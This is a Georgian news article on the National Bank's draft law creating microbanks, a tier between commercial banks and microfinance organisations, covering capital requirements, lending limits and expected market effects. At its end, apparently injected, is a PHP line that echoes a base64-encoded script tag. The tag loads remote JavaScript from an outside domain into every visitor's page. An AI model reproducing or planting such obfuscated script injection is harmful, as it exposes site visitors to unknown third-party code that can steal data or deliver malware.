celsiusi
ავერსი შნაიდერი
საქართველოში დღეს რეგისტრირებულ 15 კომერციულ ბანკს, სავარაუდოდ უკვე მომავალი წლიდან, ახალი კატეგორიის საბანკო დაწესებულებები შეუერთდებიან. ამის შესაძლებლობას, ცენტრალური ბანკის მიერ „მიკრობანკების შესახებ“ მომზადებული კანონპროექტი იძლევა.
 
უკვე ცნობილია ის მთავარი მოთხოვნები, რომელიც მიკროსაფინანსო ორგანიზაციებმა ან სულაც მესამე მხარემ მიკრობანკის სტატუსის მისაღებად უნდა დააკმაყოფილოს. არსებული პროექტის მიხედვით, მიკრობანკის დაფუძნებისთვის საჭირო კაპიტალი 10 მლნ-ით განისაზღვრა, მათი სასესხო პორტფელის 70% კი ბიზნეს ან სოფლის მეურნეობის სექტორზე გაცემული სესხები უნდა იყოს. გარდა ამისა, მიკრობანკის სტატუსის მქონე ორგანიზაციებისთვის 100 ათასიდან 1 მლნ-მდე იზრდება სესხის გაცემის ლიმიტი, რაც მათ უცხოურ ვალუტაში დაკრედიტების შესაძლებლობას უჩენთ.
 
ეროვნული ბანკის მომზადებულ ცვლილებებზე გადაცემა „ ქალების ნარატივში“ სებ-ის სამართალშემოქმედებისა და ევროკავშირის სამართალთან დაახლოების განყოფილების უფროსმა ისაუბრა.
 
“ამ პროექტით შემოდის ეროვნული ბანკის ზედამხედველობის ქვეშ ახალი ტიპის ფინანსური ინსტიტუტი - მიკრობანკი, რომელიც გარკვეულწილად შუალედურია კომერციულ ბანკსა და მიკროსაფინანსო ორგანიზაციას შორის.
 
მას ექნება უფლება განახორციელოს საბანკო საქმიანობა, თუმცა არა სრული მოცულობით, როგორც ამას კომერციული ბანკები დღეს აკეთებენ. რა იქნება განმასხვავებელი და რა იქნება მათი ბიზნესმოდელი ანუ ის ნიშა, რომელიც ვფიქრობთ, რომ ეს ფინანსური ინსტიტუტები აითვისებენ, ეს იქნება სასოფლო-სამეურნეო მიმართულების და სამეწარმეო მიმართულების დაკრედიტება და ვფიქრობთ შედეგად რეგიონებში ფინანსური ჩართულობაც გაიზრდება. ამ პროექტის მიმართაც დიდ მოლოდინებს ვამყარებთ“, - აცხადებს თამარ ქუსიკაშვილი.
 
დღეს საფინანსო ბაზარზე 39 მიკროსაფინანსო ორგანიზაცია ოპერირებს, აქედან უკვე ცნობილია იმ მისო-ების ნაწილის შესახებ, რომლებსაც უკვე გადაწყვეტილი აქვთ სტატუსი შეიცვალონ. ერთ-ერთია მიკროსაფინანსო ორგანიზაცია "ემ ბი სი", რომლის გენერალური დირექტორის თქმით, სესხის ლიმიტის ზრდისა და უცხოურ ვალუტაში დაკრეტიდების შესაძლებლობის გაჩენის გარდა მნიშვნელოვანია ისიც, რომ მიკრობანკები დეპოზიტების მიღებას, ანგარიშების გახსნას და მომხმარებლებისთვის სრულფასოვანი მომსახურების გაწევასაც შეძლებენ, რა შესაძლებლობასაც დღეს მიკროსაფინანსო ორგანიზაციები მოკლებული არიან.
 
აღსანიშნავია, რომ საკანონმდებლო ინიციატივაზე მუშაობის დაწყება საერთაშორისო სავალუტო ფონდის მიერ რამდენიმე წლის წინ გაცემულ რეკომენდაციებს ეფუძნება, რომლის მიხედვითაც ბანკებსა და მისო-ებს შორის ბაზარზე შუამავალი რგოლის გაჩენა კონკურენციას გაზრდის და საპროცენტო განაკვეთების შემცირებას შეუწყობს ხელს.
 
საქართველოს საფინანსო ბაზარზე პირველი მიკრობანკი სავარაუდოდ 2022 წლიდან გაჩნდება. შესაბამის კანონპროექტზე მუშაობა ეროვნულმა ბანკმა უკვე დაასრულა და ის პარლამენტს განსახილველად საშემოდგომო სესიაზე წარედგინება.
1057
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");